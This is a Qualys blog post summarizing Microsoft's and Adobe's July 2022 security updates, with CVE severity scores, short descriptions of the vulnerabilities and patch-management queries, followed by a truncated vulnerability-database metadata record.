July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.

2022-07-12T20:09:23

Description

# **Microsoft Patch Tuesday Summary** Microsoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). Earlier this month, July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates as well. Microsoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering. Many of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability. ## The July 2022 Microsoft vulnerabilities are classified as follows: ![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-JULY-IMPACT-1.png) ![](https://blog.qualys.com/wp-content/uploads/2022/06/image-4.png) [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>) * * * # **Notable Microsoft Vulnerabilities Patched** ### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability This vulnerability has a CVSSv3.1 score of 7.8/10. Elevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. (Article [5015874](<https://support.microsoft.com/help/5015874>)) [Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_** * * * # **Microsoft Critical Vulnerability Highlights** This month’s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows. A total of 63 unique Microsoft products/versions are affected. Downloads include Monthly Rollup, Security Only, and Security Updates. * * * ### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability This vulnerability has a CVSSv3.1 score of 8.8/10. An attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user. Windows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. If you do not have either of these versions of RDP installed on Windows 7 SP1 or Window Server 2008 R2 SP1, then you are not affected by this vulnerability. [Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_** * * * ### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability This vulnerability has a CVSSv3.1 score of 8.1/10. This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data. [Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_** * * * ### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability This vulnerability has a CVSSv3.1 score of 8.1/10. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data. [Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_** * * * ### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability This vulnerability has a CVSSv3.1 score of 7.5/10. Successful exploitation of this vulnerability requires an attacker to win a race condition. This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). [Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_** * * * # **Microsoft Last But Not Least** Earlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information. * * * # **Adobe Security Bulletins and Advisories** Adobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below. ![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-JULY-ADOBE.png) * * * ### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp This update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability. _[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_ Adobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). Successful exploitation could lead to arbitrary code execution in the context of current user. * * * ### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader This update resolves 22 vulnerabilities; 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**. _**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_ Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>), and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. * * * ### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator This update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>) _**vulnerabilities. _[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_ Adobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution. * * * ### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop This update resolves two (2) vulnerabilities; one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**. _[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_ Adobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution and memory leak. * * * * * * # Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) Qualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). You can see all your impacted hosts by these vulnerabilities using the following QQL query: vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) ![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-VMDR-1-1070x451.png) * * * # Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>) VMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the “Missing” patches to identify and deploy the applicable, available patches in one go. The following QQL will return the missing patches for this Patch Tuesday: ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) ![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-Patch-1070x451.png) ![](https://blog.qualys.com/wp-content/uploads/2022/06/image-4.png) [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>) * * * # Qualys Monthly Webinar Series ![This image has an empty alt attribute; its file name is image-1070x560.jpeg](https://blog.qualys.com/wp-content/uploads/2022/03/image-1070x560.jpeg) The Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. During the webcast, we will discuss this month’s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. * * * ### **Join the webinar** ## **This Month in Vulnerabilities & Patches** [Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)

{"id": "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). Earlier this month, July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates as well.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability.\n\n## The July 2022 Microsoft vulnerabilities are classified as follows: \n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-JULY-IMPACT-1.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2022/06/image-4.png) [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nElevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. (Article [5015874](<https://support.microsoft.com/help/5015874>))\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n# **Microsoft Critical Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 63 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\nWindows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. If you do not have either of these versions of RDP installed on Windows 7 SP1 or Window Server 2008 R2 SP1, then you are not affected by this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Microsoft Last But Not Least**\n\nEarlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-JULY-ADOBE.png)\n\n* * *\n\n### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp\n\nThis update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). Successful exploitation could lead to arbitrary code execution in the context of current user. \n\n* * *\n\n### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves 22 vulnerabilities; 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>), and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>) _**vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop\n\nThis update resolves two (2) vulnerabilities; one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n* * *\n\n# Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-VMDR-1-1070x451.png)\n\n* * *\n\n# Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-Patch-1070x451.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2022/06/image-4.png) [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n![This image has an empty alt attribute; its file name is image-1070x560.jpeg](https://blog.qualys.com/wp-content/uploads/2022/03/image-1070x560.jpeg)\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "published": "2022-07-12T20:09:23", "modified": "2022-07-12T20:09:23", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "reporter": "Debra M. Fezza Reed", "references": [], "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"], "immutableFields": [], "lastseen": "2022-07-15T23:58:32", "viewCount": 252, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "apple", "idList": ["APPLE:37AFBB95AFD80D918469C22F0A05655D", "APPLE:71C798D0F46D1E956B1D27B4A004E9B9", "APPLE:DF68F7FFE1ED4E5157204A83619C4B89"]}, {"type": "attackerkb", "idList": ["AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:23F2B591-FE1E-47A8-AA83-2DFAD7E5CE61"]}, {"type": "avleonov", "idList": ["AVLEONOV:4B6EFA5DE55BAEFCD9C72826A3524969", "AVLEONOV:B87691B304EF70215B926F66B871260A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0283", "CPAI-2022-0362"]}, {"type": "chrome", "idList": ["GCSA-5089288012050676645", "GCSA-7720125337817983232"]}, {"type": "cisa", "idList": ["CISA:F30D0D7B72453DC3FC64D2AC1AA31F33"]}, {"type": "cve", "idList": ["CVE-2022-22026", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5180-1:E631C"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-2294", "DEBIANCVE:CVE-2022-2295"]}, {"type": "fedora", "idList": ["FEDORA:1AA1C30A3C1B", "FEDORA:29E5830A072A"]}, {"type": "freebsd", "idList": ["744EC9D7-FE0F-11EC-BCD2-3065EC8FD3EC"]}, {"type": "githubexploit", "idList": ["005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "1840A140-1CD9-55F2-A8BD-9B7B27779956", "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "221070D3-0B31-5CF7-A508-B4740B63647B", "30F42F9A-5E27-592E-BE65-B85DC7E22075", "37F78533-E96A-5433-B558-90DB82C0BB27", "39D1AD81-7117-5EA3-8421-A33979B77F49", "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "56417A88-33CB-520F-8FC3-4F3E49561DDC", "5B74BEF9-0D39-5A60-8806-ABA55730878C", "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "633FDFCF-0DF4-5FE6-B5DF-85F847D6D31E", "66A7ADCB-1EAD-519B-9B1F-5694A2860BA1", "675E960A-9F2E-5575-8C21-8528492BE5C6", "6AF23F99-AE40-5899-AD81-AE3F71760F38", "70407390-C149-54F1-89B0-7611FB420601", "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "74AB19DC-78DE-56B8-8EB3-DBFA48B17AD5", "75389328-1B05-5056-B8C0-C624BF0343AD", "8516D742-8A1C-521C-8372-26BA9FBA2200", "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "B2474BAA-4133-5059-8F0B-5BAAE9664466", "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "BAA0F684-952E-5B9E-B207-0419A33AC53B", "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "FC455648-370A-582B-A03A-6299DDC272F6", "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "FFA2D3A3-AFD4-580B-8424-EE4844976B65"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:2FBDBD20FF69ADDF5A541D1E5B3D0809", "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F"]}, {"type": "kaspersky", "idList": ["KLA12549", "KLA12550", "KLA12579", "KLA12580", "KLA12581"]}, {"type": "krebs", "idList": ["KREBS:2752861A306F74170D69FBD9E0DC3AAB", "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "MALWAREBYTES:6E72426C60EECBEF071E305072060892", "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:85647D37E79AFEF2BFF74B4682648C5E"]}, {"type": "mscve", "idList": ["MS:CVE-2022-22026", "MS:CVE-2022-22029", "MS:CVE-2022-22038", "MS:CVE-2022-22039", "MS:CVE-2022-22047", "MS:CVE-2022-22049", "MS:CVE-2022-2294", "MS:CVE-2022-2295", "MS:CVE-2022-30190", "MS:CVE-2022-30221"]}, {"type": "mskb", "idList": ["KB5015874", "KB5015877"]}, {"type": "msrc", "idList": ["MSRC:4C56F4539ADD1B17DFD44549ADFEE2FF"]}, {"type": "mssecure", "idList": ["MSSECURE:85647D37E79AFEF2BFF74B4682648C5E"]}, {"type": "nessus", "idList": ["701415.PASL", "APPLE_IOS_156_CHECK.NBIN", "DEBIAN_DSA-5180.NASL", "FREEBSD_PKG_744EC9D7FE0F11ECBCD23065EC8FD3EC.NASL", "GOOGLE_CHROME_103_0_5060_114.NASL", "MACOSX_GOOGLE_CHROME_103_0_5060_114.NASL", "MICROSOFT_EDGE_CHROMIUM_103_0_1264_49.NASL", "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "OPENSUSE-2022-10055-1.NASL", "OPENSUSE-2022-10057-1.NASL", "SMB_NT_MS22_JUL_5015807.NASL", "SMB_NT_MS22_JUL_5015808.NASL", "SMB_NT_MS22_JUL_5015811.NASL", "SMB_NT_MS22_JUL_5015814.NASL", "SMB_NT_MS22_JUL_5015827.NASL", "SMB_NT_MS22_JUL_5015832.NASL", "SMB_NT_MS22_JUL_5015862.NASL", "SMB_NT_MS22_JUL_5015870.NASL", "SMB_NT_MS22_JUL_5015875.NASL", 